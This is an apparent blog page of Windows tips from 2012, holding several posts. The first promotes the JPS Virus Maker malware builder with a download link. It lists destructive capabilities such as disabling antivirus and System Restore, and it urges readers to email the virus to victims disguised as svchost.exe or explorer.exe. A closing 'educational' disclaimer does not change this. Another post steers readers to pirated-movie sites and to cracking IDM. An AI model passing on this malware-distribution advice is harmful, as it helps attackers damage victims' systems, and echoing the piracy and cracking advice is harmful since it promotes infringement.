Showing posts with label Windows. Show all posts
Showing posts with label Windows. Show all posts

Friday, August 24, 2012

How To Make Real Computer Virus

Real computer virus

Note : 
This is not a fake virus. It is not a batch script so be careful while using it. I recommend that you should create a system restore point before proceeding.
A virus can damage or harm your system. It can corrupt your file, document, software, videos, system processes. To create a real computer virus you did not need to be a programmer. It is easy as installing a software in windows 7. 
A JPS Virus Maker software make a real virus for you. You can send this virus to victim, email it to victim. You can rename this virus like explorer.exe, svchost.exe, winlogon.exe etc so that it should be hard to identify virus process in task manager. 
JPS virus maker : 
JPS virus maker
 
Fetures:



Disable Registry Editor

Disable Ms Config

Disable Task Manager

Disable Yahoo! Messenger

Disable Media Player

Disable Internet Explorer

Disable Time

Disable Group Policy

Disable Windows Explorer

Disable Norton Antivirus

Disable McAfee Antivirus

Disable Note Pad

Disable Word Pad

Disable Winows

Disable DHCP Client Service

Disable Taskbar

Disable Start Button

Disable MSN Messenger

Disable Command Prompt

Disable Security Center

Disable MSN Messenger

Disable System Restore

Disable Control Panel

Disable Desktop Icons

Disable Screen Saver
Hide Service Manager

Hide Outlook Express

Hide Windows Clock

Hide Desktop Icons

Hide All Process in Task Manager

Hide All Tasks in Task Manager

Hide Run in Start Menu

Change Explorer Caption

Clear Windows XP Password

Swap Mouse Buttons

Remove Folder Options

Lock Mouse & Keyboards

Mute Sound

Crazy Mouse

Allways CD-ROM Open

Turn Off Monitor (30 sec's)

Destroy Taskbar

Destroy Offlines (Y!Messenger)

Destroy Protected Strorage

Destroy Audio Service

Destroy Clipboard

Terminate Windows

Hide Cursor

Auto Startup

Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes

Change Server Name After Install in Process

Change Server Name

Download Link Mediafire : JPS Virus Maker (290 Kb)
Disclaimer : Hacking is a crime. I am sharing this tutorial for only educational purpose. I will not responsible for any damage done by you.

Thursday, August 23, 2012

How To Create System Restore Point in Windows 7






What is system restore :

System Restore helps you restore your computer's system files to an earlier point in time. It's a way to undo system changes to your computer without affecting your personal files, such as e-mail, documents, or photos.
Why should you create system restore point : 
Sometimes, the installation of a program or a driver can cause an unexpected change to your computer or cause Windows to behave unpredictably. Usually, uninstalling the program or driver corrects the problem. If uninstalling doesn't fix the problem, you can try restoring your computer's system to an earlier date when everything worked correctly. 
How to create System restore point :
1) Right click on computer and go to properties
 2) In the left pane, click System protection.
 3) The System Properties dialog screen opens up. Here click on Create.
 4) Type in a description for the restore point which will help you remember the point at which is was created.
 5) The time it takes to create the restore point will depend on the amount of data, computer speed etc.
 6) Now if something goes wrong you have the satisfaction knowing that you can go back in time to the point before the changes were made.
How to use system restore point :
To use this system restore point follow steps 1-3 and click on system restore button. System Restore dialog box opens up, choose your system restore point and click next. Then click finish to start system restore process.
That's it. Done !

Friday, August 17, 2012

How To Make Your Computer Talks !

Make Your computer speak
Today i am going to show you how to make your computer talks whatever you type !
Its really cool trick. You can show your geeky skills to your friends by showing them your computer talks with you.
Make your computer Talks : 
1) Open Notepad. Copy and Paste following code :
Dim Message, Speak
Message=InputBox("Enter Text to Talk","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message 
 2) Save the file, give it any name e.g. Speak.vbs, but make sure you also type .VBS after the name. Also, choose All files instead of the default Text Documents.
 3) Now double click the .vbs file and you should see the window as show below
 4) Type what ever you want and click on OK . That’s it , your computer will speak what ever you typed in the default voice
  

Thursday, August 16, 2012

Simple Trick To Lock Your Computer

 This is the simple, easy trick to lock your computer.It is very important to lock your computer when you have to leave your computer for some time, especially when you are in company or college.
Generally, to lock your computer you have to do following procedure every time: Go to "Start--> Shut Down --> Lock". As shown below :

    But today i am going to show the easier way than this. In this trick we are going to create a shortcut on desktop or you can also lock your computer by pressing "Window Key+L" only.
Let's Start : 
1) Right Click on desktop-->choose "new"-->"shortcut". The shortcut wizard will open.
 2) Type the following text in TextBox :
%windir%\\System32\\rundll32.exe user32.dll,LockWorkStation
 3) Click Next. Then Type the name for shortcut e.g. lock.
 4) Click "Finish". A shortcut icon will appear on your desktop. Now to lock your computer just double click on "lock" shortcut.
5) Another simple and best way to lock your computer is "WindowsKey+L".
Please share your comments in CommentBox ! 

Sunday, August 12, 2012

Create Locked Password Protected Folder Without Using Any Software

Yes, you can create a locked password protected folder without using any third party software. While surfing on internet i found a .BAT script that creates a folder with password protection. You have to only copy & paste this script, put your password and you are done!

Here are the steps :
1) Open notepad. Copy and paste below script and save file as lock.bat
cls
@ECHO OFF
title technoyz.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== Your_password_goes_here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

2) Now when you double click on lock.bat, it will create a new folder named "MyFolder". You can put your private data into this folder.
3) After that again double click on lock.bat, it will hide the MyFolder. To show this folder click on lock.bat and enter your password.

 4) In this type, there is one type of drawback that anyone can see your password. You have to just right click on lock.bat-->choose "edit" and you can see source for file lock.bat.
5) The solution is to convert this .bat file to .exe file. By doing this nobody can view source for lock.exe. But you have to download "Bat to Exe converter" for this.
6) Download Link for : "Bat to Exe converter"
7) Open converter and select path of your .bat file and click on compile.





8) Done ! Delete the lock.bat file and Enjoy your locked password protected folder.

Thursday, August 2, 2012

3 Best Websites To Download Free Movies


Why Pay? Get all this free !
There's never been a better time to be a cheapskate. Instead of buying CDs, DVDs, you can download almost any movie without paying a penny. Movies new and old are mere clicks away, with no registration required.
1) world4free 
You can search and download free movies in categories like bollywood, hollywood, dubbed in hindi hollywood movies. You can also download full PC software, Games, movie trailers, songs, lyrics, HD wallpapers and more.

2) worldfree4u
Here you can download movies in categories like Bollywood, Hollywood, Punjabi movies, dual audio Hollywood movies. Also you can download free PC software's, games, songs. You can watch online TV or online movie, no need to download.


3) hnmovies
Here you can find huge collection of movies in different categories like Bollywood, Hollywood, Dual audio Hollywood, 18+ movies, horror movies, animated movies and lot more.


NOTE !  I recommend to use IDM for downloading these movies as it supports resume capabilities and improves downloading speed. You can check my older post to make your IDM full version : How to crack IDM to Full version
Please share your views in comment !!!

Wednesday, August 1, 2012

Restore Accidentally Deleted Files with Recuva


It can be the worst feeling in the world when you accidentally delete a very important file you have been working on for days.  Today we look at Recuva, a free tool that helps you restore accidentally deleted files.
 What is Recuva ?
Recuva is a freeware Windows utility to restore files that have been accidentally deleted from your computer. This includes files emptied from the Recycle bin as well as images and other files that have been deleted by user error from digital camera memory cards or MP3 players. It will even bring back files that have been deleted by bugs, crashes and viruses!
After using Recuva for a couple of days, I have ended up being very impressed with it. It is very fast with finding recoverable files and when you click on what you want brought back, it restores the file and sends it back to your hard drive within seconds.
Let's Begin :
1) Download Recuva from here... and install it.
2) When you first start up Recuva it brings up an easy to follow wizard which guides you through the recovery process.  There is an option to disable this from starting up if you don’t care to use it.
 3) Now choose the type of file your trying to recover.  If you’re not sure click on Other to show all files
 4) Select the location of where the file was located.  You can choose removable media, certain directories, or search everywhere on the computer.
5) Wait while Recuva scans your system for deleted files.
6) When you get the results it will show the file(s) and the green or red dot next to them lets you know how likely they will be restored without any damage.

 7) Now say I want to want to recover those 3 files? I just need to tick them and click the “recover” button. Recuva will ask me to specify where on the computer they should go.
8) Just remember to untick those files in Recuva before you close the program because Recuva remembers those files next time and will keep on downloading them over and over again! So untick them once you have recovered them.
Note : But as with any deleted file that you want to bring back, the older it is, the harder it will be to bring back. Plus if you are able to bring it back, the older it is, the more corrupted the file will be. So if you want to bring a deleted file back, you need to do it as fast as possible. The more you delay, the less chance there is of recovering it.
Do you use Recuva? If so, what have been your experiences with it?  What do you think about recuva? Is there any better software than recuva? please share your views in comments.

Tuesday, April 17, 2012

How to Install and configure PHP on windows xp with apache and MySql



1)    creat a dir named PHP in C: as C:\php
2)    Locate php.ini-production in php folder and renamed it to php.ini
3)    Open php.ini and locate extension_dir directives, uncomment and change the value into:-  extension_dir = "C:\php\ext"
4)    Still with php.ini, next you need to find output_buffering and change it to
output_buffering = Off
5)    Locate php_bz2.dll, php_mbstring.dll, php_mysql.dll, and php_mysqli.dll and uncomment it.
6)    Now we are done with the php.ini configuration, the next step would be locating Apache httpd.conf (if you didn’t change the default Apache installation directory it can be found at C:\Program Files\Apache Software Foundation\Apache2.2\conf)
7) Open httpd.conf and uncomment expires_module, headers_module, rewrite_module and then add
LoadModule php5_module "c:/php/php5apache2_2.dll"
8)    Still in httpd.conf, inside
<IfModule mime_module>
 
Add:
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps
 
9)    Still in httpd.conf once again, locate
 
<IfModule dir_module>
DirectoryIndex index.html
</IfModule>
 
And replace with:
 
                        <IfModule dir_module>
                        DirectoryIndex index.html index.htm index.php
                        </IfModule>
10)   Now we’re done with httpd.conf the next step is opening 
        System Properties (Windows Key + Pause/Break or by right
       clicking My Computer and then choose Properties) and then
       choose Advanced tab and finally click on Environment Variables
 
Locate Path and then double click on it then add
              
C:\php
 
11)   Still in Environment Variables, next you need to click New System
      Variables  and then add
 
Variable name: PHPRC
Variable value: C:\php
 
12)   We’re finished with adding and editing System Variables, 
      now go to  
     C:\Program Files\Apache Software Foundation\Apache2.2\htdocs 
     and then create a new text file inside that directory named 
     test.php and open it with notepad then add this
 
<?php phpinfo() ?>
 
13)   Now we’re done with the PHP Apache integration.
      Save your work and then restart your computer
 
14)   Open your browser and type http://localhost/test.php 
      if you see the info about php in your browser then you are 
      done with apache php integration.